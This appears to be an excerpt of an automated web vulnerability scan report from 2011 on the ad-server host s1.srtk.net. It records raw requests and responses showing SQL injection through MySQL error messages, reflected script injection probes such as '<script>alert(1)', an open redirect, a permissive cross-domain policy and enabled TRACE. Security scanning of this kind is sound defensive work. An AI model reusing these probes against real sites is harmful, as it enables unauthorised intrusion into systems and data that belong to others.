3.1. http://s1.srtk.net/www/delivery/rd.php [url parameter]
3.2. http://s1.srtk.net/www/delivery/rd.php [Referer HTTP header]
4. Cross-site scripting (reflected)
5. Cookie without HttpOnly flag set
Severity: | High |
Confidence: | Firm |
Host: | http://s1.srtk.net |
Path: | /www/delivery/rd.php |
GET /www/delivery/rd.php Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:23:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk Set-Cookie: MAXID=09a658fc5598e5 location: http://ad.doubleclick.net Content-Length: 288 Connection: close Content-Type: application/x-javascript SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=977\' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 |
Severity: | High |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s1.srtk.net |
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:39 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 26 Jan 2011 00:57:37 GMT ETag: "1197a8-ff-49ab551aea240" Accept-Ranges: bytes Content-Length: 255 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | /www/delivery/rd.php |
GET /www/delivery/rd.php Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:24:04 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk Set-Cookie: MAXID=176a30acc48080 location: http://ac1bf74d0945992bd Content-Length: 0 Connection: close Content-Type: application/x-javascript |
Severity: | Information |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | /www/delivery/rd.php |
GET /www/delivery/rd.php HTTP/1.1 Host: s1.srtk.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MAXID=c0213aeff75a3a Referer: //a17dec3f65c516428/a |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:24:29 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 location: //a17dec3f65c516428/a Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | Information |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | /www/delivery/rd.php |
GET /www/delivery/rd.php Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:23:52 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk Set-Cookie: MAXID=22038148057ac3 location: http://ad.doubleclick.net Content-Length: 362 Connection: close Content-Type: application/x-javascript SELECT v.variableid AS variable_id,v.trackerid AS tracker_id,v.name AS name,v.datatype AS type FROM variables AS v WHERE v.trackerid=9774e88d<script>alert(1)< You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd<script> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | /www/delivery/rd.php |
GET /www/delivery/rd.php Host: s1.srtk.net Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 16:00:11 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache P3P: policyref="http://s1.srtk Set-Cookie: MAXID=c0213aeff75a3a location: http://ad.doubleclick.net Content-Length: 0 Connection: close Content-Type: application/x-javascript |
Severity: | Information |
Confidence: | Certain |
Host: | http://s1.srtk.net |
Path: | / |
TRACE / HTTP/1.0 Host: s1.srtk.net Cookie: ca9752baf47e81e4 |
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:23:39 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: message/http TRACE / HTTP/1.0 Host: s1.srtk.net Cookie: ca9752baf47e81e4 |